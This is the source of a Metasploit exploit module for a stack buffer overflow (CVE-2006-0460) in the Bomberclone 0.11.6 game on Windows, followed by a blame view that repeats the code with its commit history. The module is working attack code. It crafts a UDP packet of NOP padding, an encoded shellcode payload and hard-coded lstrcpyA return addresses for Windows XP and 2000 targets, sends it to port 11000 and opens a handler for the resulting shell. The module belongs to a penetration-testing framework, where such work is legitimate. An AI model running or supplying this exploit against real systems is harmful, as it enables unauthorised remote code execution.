modules/exploits/windows/misc/bomberclone_overflow.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Bomberclone 0.11.6 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.
        The return address is overwritten with lstrcpyA memory address,
        the second and third value are the destination buffer,
        the fourth value is the source address of our buffer in the stack.
        This exploit is like a return in libc.

        ATTENTION
        The shellcode is exec ONLY when someone try to close bomberclone.
      },
      'Author'         => 'Jacopo Cervini <acaro[at]jervus.it>',
      'References'     =>
        [
          ['CVE', '2006-0460'],
          ['OSVDB', '23263'],
          ['BID', '16697']
        ],
      'Payload'        =>
        {
          'Space'    => 344,
          'BadChars' => "\x00"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP2 Italian',   { 'Ret' => 0x7c80c729, } ], # kernel32!lstrcpyA
          ['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA
          ['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2006-02-16'
      ))

    register_options([ Opt::RPORT(11000) ])
  end

  def exploit
    connect_udp

    pattern  = make_nops(421)
    pattern << payload.encoded
    pattern << [ target.ret ].pack('V')
    pattern << "\x04\xec\xfd\x7f" * 2
    pattern << "\xa4\xfa\x22\x00"

    request  = "\x00\x00\x00\x00\x38\x03\x41" + pattern + "\r\n"

    print_status("Trying #{target.name} using lstrcpyA address at #{"0x%.8x" % target.ret }...")

    udp_sock.put(request)
    udp_sock.get(5)

    handler(udp_sock)
    disconnect_udp
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
ported, untested 2006-12-28 06:17:56 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Udp`
ported, untested 2006-12-28 06:17:56 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Bomberclone 0.11.6 Buffer Overflow',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.`
			`The return address is overwritten with lstrcpyA memory address,`
			`the second and third value are the destination buffer,`
			`the fourth value is the source address of our buffer in the stack.`
			`This exploit is like a return in libc.`

			`ATTENTION`
			`The shellcode is exec ONLY when someone try to close bomberclone.`
ported, untested 2006-12-28 06:17:56 +00:00			`},`
Fix #53 , use Author, not Authors 2007-03-12 01:08:18 +00:00			`'Author' => 'Jacopo Cervini <acaro[at]jervus.it>',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'References' =>`
ported, untested 2006-12-28 06:17:56 +00:00			`[`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`['CVE', '2006-0460'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '23263'],`
Remove bad references (dead links) 2015-10-27 12:41:32 -05:00			`['BID', '16697']`
ported, untested 2006-12-28 06:17:56 +00:00			`],`
			`'Payload' =>`
			`{`
			`'Space' => 344,`
			`'BadChars' => "\x00"`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Windows XP SP2 Italian', { 'Ret' => 0x7c80c729, } ], # kernel32!lstrcpyA`
			`['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA`
			`['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA`
			`],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2006-02-16'`
ported, untested 2006-12-28 06:17:56 +00:00			`))`

Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([ Opt::RPORT(11000) ])`
ported, untested 2006-12-28 06:17:56 +00:00			`end`

			`def exploit`
			`connect_udp`

			`pattern = make_nops(421)`
			`pattern << payload.encoded`
			`pattern << [ target.ret ].pack('V')`
			`pattern << "\x04\xec\xfd\x7f" * 2`
			`pattern << "\xa4\xfa\x22\x00"`

			`request = "\x00\x00\x00\x00\x38\x03\x41" + pattern + "\r\n"`

			`print_status("Trying #{target.name} using lstrcpyA address at #{"0x%.8x" % target.ret }...")`

			`udp_sock.put(request)`
Fix msftidy and tweak a few modules missing timeouts 2014-06-30 00:46:28 -05:00			`udp_sock.get(5)`
ported, untested 2006-12-28 06:17:56 +00:00
			`handler(udp_sock)`
			`disconnect_udp`
			`end`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`end`